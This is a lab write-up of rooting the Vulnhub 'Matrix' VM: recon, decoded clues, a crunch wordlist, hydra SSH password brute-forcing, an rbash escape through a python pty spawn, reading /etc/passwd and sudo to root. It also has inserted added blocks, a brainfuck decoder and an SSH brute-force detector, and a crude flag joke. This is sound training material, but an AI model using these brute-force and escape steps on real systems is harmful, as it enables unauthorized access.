2019/01/26 :
A new VM from vulnhub.com:
the link here:
ariokio@GB-BXBT-1900:~/Documents/VM/vulnhub$ wget https://download.vulnhub.com/matrix/Machine_Matrix.zip
=============
First, a recon of the network with my script:
root@aridebsec:~/Documents# ./all_live_hosts.sh 10.0.1.0/24
xx-xxx-2 (10.0.1.1)
attacker (10.0.1.41)
porteus (10.0.1.72) : the victim?
=============
An nmap scan to identify the machine's ports and services:
# Nmap 7.70 scan initiated Sat Jan 26 18:23:48 2019 as: nmap -sC -sV -A -oA Matrix_nmap 10.0.1.72
Nmap scan report for porteus (10.0.1.72)
Host is up (0.0022s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 9c:8b:c7:7b:48:db:db:0c:4b:68:69:80:7b:12:4e:49 (RSA)
| 256 49:6c:23:38:fb:79:cb:e0:b3:fe:b2:f4:32:a2:70:8e (ECDSA)
|_ 256 53:27:6f:04:ed:d1:e7:81:fb:00:98:54:e6:00:84:4a (ED25519)
80/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
31337/tcp open http SimpleHTTPServer 0.6 (Python 2.7.14)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.14
|_http-title: Welcome in Matrix
MAC Address: 08:00:27:E5:B2:AA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 2.16 ms porteus (10.0.1.72)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jan 26 18:24:24 2019 -- 1 IP address (1 host up) scanned in 37.18 seconds
So we have ports 22, 80 and 31337; the last one is a Python SimpleHTTPServer... It looks like
Let's look at port 80 and port 31337 in a browser.
Port 80 opens a site with a counter, but the counter does not move. Nothing in the source code.
A slightly different page on port 31337: this time the source code contains:
Cypher
"You know.. I know this steak doesn't exist. I know when I put it in my mouth; the Matrix is telling my brain that it is juicy, and delicious. After nine years.. you know what I realize? Ignorance is bliss."
</div>
</div>
<!-- service -->
<!-- End / service -->
Well, well:
a quick base64 decode (nothing ventured, nothing gained):
root@aridebsec:~/Documents/Matrix_vulnhub# echo "ZWNobyAiVGhlbiB5b3UnbGwgc2VlLCB0aGF0IGl0IGlzIG5vdCB0aGUgc3Bvb24gdGhhdCBiZW5kcywgaXQgaXMgb25seSB5b3Vyc2VsZi4gIiA+IEN5cGhlci5tYXRyaXg=" | base64 -d
echo "Then you'll see, that it is not the spoon that bends, it is only yourself. " > Cypher.matrix
OK, but what does that mean????? OK, after a few minutes of thought: what if we added that to the URL... 😉
That downloads a file... Cool, let's go...
root@aridebsec:~/Documents/Matrix_vulnhub# file Cypher.matrix
Cypher.matrix: ASCII text
root@aridebsec:~/Documents/Matrix_vulnhub# stat Cypher.matrix
File: Cypher.matrix
Size: 4121 Blocks: 16 IO Block: 4096 regular file
Device: 801h/2049d Inode: 2228603 Links: 1
Access: (0644/-rw-r--r--) Uid: ( 0/ root) Gid: ( 0/ root)
Access: 2019-01-26 18:52:33.341345750 -0500
Modify: 2019-01-26 18:51:31.485346015 -0500
Change: 2019-01-26 18:51:46.401345951 -0500
Birth: -
Nothing special, it's an ASCII file.
We open it and get a brainfuck-style file containing (excerpt):
+++.< +++[- >+++< ]>+++ .+++. .<+++ [->-- -<]>- ---.- -.<++ ++[-> ++++<
]>+.< +++++ ++++[ ->--- ----- -<]>- --.<+ +++++ +++[- >++++ +++++ <]>++
.+.-- .---- ----- .++++ +.--- ----. <++++ ++++[ ->--- ----- <]>-- -----
.<+++ +++++ [->++ +++++ +<]>+ +++++ +++++ ++++. ----- ----. <++++ ++++[
->--- ----- <]>-- ----. <++++ ++++[ ->+++ +++++ <]>++ +++++ +++++ ++++.
<+++[ ->--- <]>-- ----. <++++ [->++ ++<]> ++..+ +++.- ----- --.++ +.<++
+[->- --<]> ----- .<+++ ++++[ ->--- ----< ]>--- --.<+ ++++[ ->--- --<]>
----- ---.- --.<
We go to the site https://www.dcode.fr/brainfuck-language
which translates the code as:
You can enter into matrix as guest, with password k1ll0rXX
Note: Actually, I forget last two characters so I have replaced with XX try your luck and find correct string of password.
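As an added example (not part of the original post), a small brainfuck interpreter that performs the same translation dcode.fr did on Cypher.matrix, but offline, so the file never has to be pasted into a third-party site. The sample program embedded in it is constructed for the demonstration and is not the contents of the real Cypher.matrix.

```python
# Added example, not from the original post: a small brainfuck interpreter
# so Cypher.matrix can be decoded offline instead of pasting it into dcode.fr.

def run_brainfuck(code: str, max_steps: int = 1_000_000) -> str:
    """Execute a brainfuck program and return everything it prints."""
    # Anything outside the eight instructions is a comment, so the
    # 5-character groups and line breaks of the listing are simply dropped.
    code = "".join(c for c in code if c in "<>+-.,[]")
    jump, stack = {}, []                      # matching-bracket table
    for i, c in enumerate(code):
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError(f"unmatched ']' at offset {i}")
            j = stack.pop()
            jump[i], jump[j] = j, i
    if stack:
        raise ValueError(f"unmatched '[' at offset {stack[-1]}")
    tape, ptr, pc, out = [0] * 30000, 0, 0, []
    for _ in range(max_steps):                # bound the run time
        if pc >= len(code):
            return "".join(out)
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256  # 8-bit cells, wrap around
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(chr(tape[ptr]))
        elif c == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1                               # ',' (input) is not needed here
    raise RuntimeError("step limit exceeded: program does not terminate")

# Constructed sample program (not the real Cypher.matrix), written in the
# same 5-character groups as the listing; it prints "Hi!" and a newline.
SAMPLE = """
+++++ +++[> +++++ ++++< -]>.< ++++[ >++++ ++++< -]>+. <++++ ++++[
>---- ----- <-]>. <+++[ >---- ---<- ]>--.
"""

if __name__ == "__main__":
    print(run_brainfuck(SAMPLE), end="")
```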
OK, so we have: SSH, HTTP, and a port 31337 that gives access to a file which, once downloaded and decoded, gives us
a user "guest" and part of a password... Well well... As the text says, two characters are missing from the password.
We'll build a candidate dictionary by filling in the two characters with the crunch tool (already used in the
MrRobot machine challenge):
root@aridebsec:~/Documents/Matrix_vulnhub# crunch 8 8 -t k1ll0r%@ -o dict.txt
Crunch will now generate the following amount of data: 2340 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 260
crunch: 100% completed generating output
Then, since HTTP gives nothing, we go to port 22 and try our luck:
root@aridebsec:~/Documents/Matrix_vulnhub# hydra -l guest -P dict.txt 10.0.1.72 ssh
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-01-26 19:12:06
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 260 login tries (l:1/p:260), ~17 tries per task
[DATA] attacking ssh://10.0.1.72:22/
[STATUS] 180.00 tries/min, 180 tries in 00:01h, 84 to do in 00:01h, 16 active
[22][ssh] host: 10.0.1.72 login: guest password: k1ll0r7n
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 3 final worker threads did not complete until end.
[ERROR] 3 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-01-26 19:13:14
root@aridebsec:~/Documents/Matrix_vulnhub#
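From the defender's side, as an added example that is not part of the original post: the hydra run above leaves a burst of sshd password failures followed by a single success in the target's auth log. The script below flags that pattern; the log lines, the fixed year used for parsing and the thresholds are constructed assumptions, not material from the post.

```python
# Added example, not from the original post: detect an SSH password-guessing
# burst like the hydra run above from sshd auth-log lines.
import re
from collections import defaultdict
from datetime import datetime

# Standard OpenSSH auth message; "invalid user" appears when the login name
# does not exist (guest exists on porteus, so the group is optional).
LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>[\d.]+) port \d+ ssh2$")

def parse_auth(lines, year=2019):  # syslog omits the year: assumed here
    for line in lines:
        m = LOG_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]

def detect_bruteforce(lines, window_s=60, threshold=20):
    """Flag (src, user) pairs with >= threshold failed logins inside any
    window_s-second window, and note whether a success followed them."""
    recent, alerts = defaultdict(list), {}
    for ts, result, user, src in sorted(parse_auth(lines)):
        key = (src, user)
        if result == "Failed":
            recent[key] = [t for t in recent[key]
                           if (ts - t).total_seconds() <= window_s] + [ts]
            if len(recent[key]) >= threshold:
                a = alerts.setdefault(key, {"failures": 0, "success_after": False})
                a["failures"] = max(a["failures"], len(recent[key]))
        elif key in alerts:  # Accepted right after a burst: likely guessed
            alerts[key]["success_after"] = True
    return alerts

# Constructed sample: 30 guesses from the attacking host within 30 seconds
# (hydra reported ~180 tries/min), then the successful login, plus two
# unrelated failures from the gateway that must not be flagged.
def _line(sec, result, user, src):
    return (f"Jan 26 19:12:{sec:02d} porteus sshd[{4000 + sec}]: {result} "
            f"password for {user} from {src} port {40000 + sec} ssh2")

SAMPLE_LOG = [_line(s, "Failed", "guest", "10.0.1.41") for s in range(30)]
SAMPLE_LOG += [_line(31, "Accepted", "guest", "10.0.1.41"),
               _line(5, "Failed", "root", "10.0.1.1"),
               _line(40, "Failed", "root", "10.0.1.1")]

if __name__ == "__main__":
    for (src, user), info in detect_bruteforce(SAMPLE_LOG).items():
        print(f"ALERT {src} -> {user}: {info}")
```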
So we have a user and a password:
guest : k1ll0r7n
SSH connection to the victim, then:
root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72
The authenticity of host '10.0.1.72 (10.0.1.72)' can't be established.
ECDSA key fingerprint is SHA256:BMhLOBAe8UBwzvDNexM7vC3gv9ytO1L8etgkkIL8Ipk.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.0.1.72' (ECDSA) to the list of known hosts.
guest@10.0.1.72's password:
Last login: Mon Aug 6 16:25:44 2018 from 192.168.56.102
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ ls -l
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ ll
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$ cd
-rbash: cd: restricted
guest@porteus:~$ ls
-rbash: /bin/ls: restricted: cannot specify `/' in command names
guest@porteus:~$
OK, OK...
pressing Tab:
guest@porteus:~$
! bg command dirs enable fc help let mcedit readonly suspend type vi
./ bind compgen disown esac fg history ll popd return test typeset wait
: break complete do eval fi if local printf select then ulimit while
[ builtin compopt done exec for in logout pushd set time umask {
[[ caller continue echo exit function jobs ls pwd shift times unalias }
]] case coproc elif export getopts kill mapfile read shopt trap unset
alias cd declare else false hash la mc readarray source true until
guest@porteus:~$ echo $PATH
/home/guest/prog
guest@porteus:~$ echo /home/guest/prog/*
/home/guest/prog/vi
guest@porteus:~$ echo $SHELL
/bin/rbash
guest@porteus:~$
But what the fuck is this restricted shell....
Thanks Gotmilk:
root@aridebsec:~/Documents/Matrix_vulnhub# ssh guest@10.0.1.72 "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/bash\")'"
guest@10.0.1.72's password:
guest@porteus:~$ cat /etc/passwd
cat /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/false
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/lib/gdm:/sbin/nologin
oprofile:x:51:51:oprofile:/:/bin/false
usbmux:x:52:83:User for usbmux daemon:/var/empty:/bin/false
sddm:x:64:64:User for SDDM:/var/empty:/bin/false
pulse:x:65:65:User for PulseAudio:/var/run/pulse:/bin/false
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
guest:x:1000:100:,,,:/home/guest:/bin/rbash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
colord:x:72:72:Color Daemon Owner:/var/lib/colord:/bin/false
polkitd:x:28:28:PolicyKit Daemon Owner:/etc/polkit-1:/bin/false
trinity:x:1001:1001::/home/trinity:/bin/bash
guest@porteus:~$ sudo -l
sudo -l
User guest may run the following commands on porteus:
(ALL) ALL
(root) NOPASSWD: /usr/lib64/xfce4/session/xfsm-shutdown-helper
(trinity) NOPASSWD: /bin/cp
guest@porteus:~$ sudo /bin/bash
sudo /bin/bash
Password:
There's a lot of it about, you know.
Password:
Ying Tong Iddle I Po
Password: k1ll0r7n
root@porteus:/home/guest#
root@porteus:/home/guest# id
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
root@porteus:/home/guest#
Game over!!!!! I'm root
root@porteus:/home/guest# ls
ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ prog/
root@porteus:/home/guest# cd
cd
root@porteus:~# ls
ls
Desktop/ Documents/ Downloads/ Music/ Pictures/ Public/ Videos/ flag.txt
root@porteus:~# cat flag.txt
cat flag.txt
_,-.
,-' _| EVER REWIND OVER AND OVER AGAIN THROUGH THE
|_,-O__`-._ INITIAL AGENT SMITH/NEO INTERROGATION SCENE
|`-._\`.__ `_. IN THE MATRIX AND BEAT OFF
|`-._`-.\,-'_| _,-'.
`-.|.-' | |`.-'|_ WHAT
| |_|,-'_`.
|-._,-' | NO, ME NEITHER
jrei | | _,'
'-|_,-' IT'S JUST A HYPOTHETICAL QUESTION